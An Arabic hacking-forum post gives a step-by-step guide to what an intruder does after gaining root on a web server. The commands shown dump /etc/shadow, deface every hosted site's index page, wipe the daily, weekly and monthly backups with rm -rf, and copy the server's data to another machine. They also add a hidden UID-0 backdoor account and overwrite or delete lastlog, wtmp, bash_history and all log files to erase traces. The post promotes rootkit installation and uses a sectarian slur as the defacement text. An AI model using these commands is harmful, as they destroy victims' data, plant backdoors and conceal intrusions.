عرض مشاركة واحدة
قديم 07-08-2010, 09:42 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Q2-FOX2R
 
الصورة الرمزية Q2-FOX2R
 

 

 
إحصائية العضو






Q2-FOX2R غير متواجد حالياً

إرسال رسالة عبر MSN إلى Q2-FOX2R

 

 

إحصائية الترشيح

عدد النقاط : 10
Q2-FOX2R is on a distinguished road

افتراضي مآ بعد الرووت ....


بسم الله الرحمن الرحيم

طبعاااول شي نحتاج للاداه الي اسمها البيوتي عشان نتصل بالسيرفر وهي متوفرة في النت يعني
ما عليك غير انك تكتب في قوقل ===> putty

طبعاا لنفرض انك عملت اتصال ونجحت بالاتصال بالسيرفر وش تسوي؟ تعال اشرح لك اهم الاوامر:

cat /etc/shadow الامر اسمه استعراض ملف الشدو والهدف منه اضهار جميع باسووردات النظام

cat /etc/httpd/conf/httpd.conf | grep ServerName هذا الامر الجميل يستعرض لك المواقع الي على السيرفر

echo "حط الكلام الي تبي هنا">/home/*/public_html/index.htmlالامر هذا لتغيير الاندكس وكتابة اي شي تريد


طيب كذا تكون انت بس غيرت الاندكسات نبي نسوي فيه حركة نذاله ونحذف الباك اب اليومي والاسبوعي وشهريوانت في الشل اكتب

cd /backup/cpbackup

واكتب

ls -la

راح يطلع لك مجلدات الباك اب اليومي والاسبوعي وشهري بهذا الاسم

daily
weekly
monthly

اذا ماطلعت لك بتكون على هذا المسار

cd /backup

الان علشان نحذف مجلدات الباك اب نكتب

rm -rf daily لحذف الباك اب اليومي
rm -rf weekly لحذف الباك اب الاسبوعي
rm -rf monthly لحذف الباك اب الشهري

بعض الصحاب السيرفرات يغير اسم مجلد الباك اب او يسوي مجلد في مسار ثاني

هذا امر البحث عن المجلدات الي تحمل هذا الاسم backup وحذفها


find / -name "cpbackup*" -exec rm {} ; الامر لحذف ملفات الباك اب بالسيرفر

find / -name "backup*" -exec rm {} ; وهذا كذلك

اما لو حاب تاخذ باك اب لسيرفر كامل ونقله لسيرفر اخر اول خطوه تاخذ باك اب لجميع الموقع وتنقلهم لمجلد وتضغط المجلد

وتدخل على المسار الموجود فيه الباك اب وتنفذ الامر التالي

scp Backup.tar.gz root@127.0.0.1:/backup/cpbackup


نغير الاي بي الى اي بي السيرفر الجديد واضغط انتر راح يطلب الباسبورد بعدها راح يبدا ينقل الباك اب وفيه طريقه ثانيه من خلال لوحة السيرفر لو فكيت بااااسبورد الروت

/usr/sbin/useradd -o -u 0 -g 0 Q2-FOX2R -p 123456789هذا الامر لانشاء روت يحمل الاسم Q2-FOX2R والباسوورد 123456789

/var/log لمشاهدت ملف اللوق(الدخول للسيرفر)

/root/.bash_history وهذا كذلك

echo "fuck shia">lastlog
هذا الامر لتغيير الاي بي مالك الى كلمة fuck shia

echo "fuck shia">wtmpونكرر العملية هنا ايضاا

cat /root/.bash_history الامر هذا لمشاهدت جميع العمليات بالسيرفر

echo "fuck shia">.bash_history

مسحناها وخلينا يطلع له fuck shia

وبالنهاية قبل لاتطلع طبق هالاوامر واحد ورا الثاني:

هذا امر بحث عن الملفات الي يكون فيها log وتكون ويتخزن فيها اي بيك ويحذفها

كود PHP:
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \; 

وهم مسح العمليات ومسح اللوق



احيان وانت شغال في السيرفر يفصل او يعلق ويحتاج تعمل له رستارت

لعمل رستارت للسيرفر كامل : reboot
لعمل ريستارت لقواعد البيانات: /etc/init.d/mysql restart
لعمل ريستارت لسي بنل /etc/rc.d/init.d/cpanel restart

و اهم شئ نسته ههه
تركيب SSH-Key لضمان الرجوع للسيرفر .... الطريقة و الله حلوة أخليها ليوم ثاني بادن الله
و تركيب روت كيت على السيرفر طبعا لضمان الرجوع للسيرفر

و عشانكم عملت شرح للتكريب الروت كت من الاول لالاآخر
لتحميل الشرح فيديو

http://www.multiupload.com/9ZS98J3M06

باسوورد فك الضغط
Q2-FOX2R
و اتمنى اي واحد عندو طرق ثانية يشاركنا بيها
في النقاش افادة
و ما تنسو التقييم هههههههههههه
وفي النهاية تقبلوا تحياتي وارجو ان تعذروني اذا كان فيه تقصير

وان شاء الله لي اضافات على الموضوع

:yes::yes:n028


lN fu] hgv,,j >>>>

التوقيع

[grade="00008B FF6347 008000 4B0082 FF0000"]
غائب بسبب الظروف و الله أعلم و أدرى بي ...
و الله آسف جدا يا شبآب[/grade]http://img23.imageshack.us/img23/1597/sp1d3er.gif





للتواصل : louze-@hotmail.com



My NeW Zone-H UndeR ConstruCtioN : http://zone-h.org/archive/notifier=Q2-FOX2R

Special Greetz T0 :
Volc4no & Every One Who Loves Q2-FOX2R

كود PHP:
<?php

$var 
= array ( "I love","Volcano"," & Stone Love"," & الشبح المرح");
foreach ( 
$var as $name )
{
echo 
$name;
}
?>
http://img197.imageshack.us/img197/3209/sp1d3er.png

اخوكم في الله
يونس
Q2-FOX2R

smilies7

 

   

رد مع اقتباس